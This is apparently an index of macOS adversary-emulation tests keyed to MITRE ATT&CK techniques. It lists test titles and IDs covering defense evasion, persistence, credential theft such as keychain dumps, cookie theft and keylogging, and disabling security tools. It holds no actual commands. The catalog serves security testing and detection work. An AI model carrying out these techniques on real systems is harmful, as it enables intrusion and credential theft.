defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,bash
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,9,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,10,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,3,Copy and Delete Mailbox Data on macOS,3824130e-a6e4-4528-8091-3a52eeb540f6,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,6,Copy and Modify Mailbox Data on macOS,8a0b1579-5a36-483a-9cde-0236983e1665,bash
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,9,MacOS - Timestomp Date Modified,87fffff4-d371-4057-a539-e3b24c37e564,sh
defense-evasion,T1497.003,Time Based Evasion,1,Delay execution with ping,8b87dd03-8204-478c-bac3-3959f6528de3,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
defense-evasion,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,6,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,7,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,8,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,9,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,10,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,4,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - FreeBSD/Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,3,Binary simply packed by UPX,b16ef901-00bb-4dda-b4fc-a04db5067e20,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,4,"Binary packed by UPX, with modified headers",4d46e16b-5765-4046-9f25-a600d3e65e4d,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,1,Space After Filename (Manual),89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
persistence,T1136.001,Create Account: Local Account,3,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,sh
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
persistence,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
command-and-control,T1572,Protocol Tunneling,7,Cloudflare tunnels (Linux/macOS),228c336a-2f79-4043-8aef-bfa453a611d5,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,sh
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,sh
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,sh
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,sh
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1105,Ingress Tool Transfer,31,File download via nscurl,5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c,sh
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Proxy: Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,bash
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
collection,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1005,Data from Local System,3,Copy Apple Notes database files using AppleScript,cfb6d400-a269-4c06-a347-6d88d584d5f7,sh
collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spoofing a credential prompt using osascript,b7037b89-947a-427a-ba29-e7e9f09bc045,bash
lateral-movement,T1021.005,Remote Services:VNC,1,Enable Apple Remote Desktop Agent,8a930abe-841c-4d4f-a877-72e9fe90b9ea,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,sh
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
privilege-escalation,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
credential-access,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
credential-access,T1539,Steal Web Session Cookie,5,Copy Safari BinaryCookies files using AppleScript,e57ba07b-3a33-40cd-a892-748273b9b49a,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain Dump,88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,2,Export Certificate Item(s),1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,3,Import Certificate Item(s) into Keychain,e544bbcb-c4e0-4bd0-b614-b92131635f59,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,4,Copy Keychain using cat utility,5c32102a-c508-49d3-978f-288f8a9f6617,sh
credential-access,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
credential-access,T1040,Network Sniffing,9,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,37807632-d3da-442e-8c2e-00f44928ff8f,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,15,Find Azure credentials,a8f6148d-478a-4f43-bc62-5efee9f931a4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,16,Find GCP credentials,aa12eb29-2dbb-414e-8b20-33d34af93543,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,17,Find OCI credentials,9d9c22c9-fa97-4008-a204-478cf68c40af,sh
credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spoofing a credential prompt using osascript,b7037b89-947a-427a-ba29-e7e9f09bc045,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1016.001,System Network Configuration Discovery: Internet Connection Discovery,2,"Check internet connection using ping freebsd, linux or macos",be8f4019-d8b6-434c-a814-53123cdcc11e,bash
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
discovery,T1040,Network Sniffing,9,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,8,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,sh
discovery,T1082,System Information Discovery,12,"Environment variables discovery on freebsd, macos and linux",fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
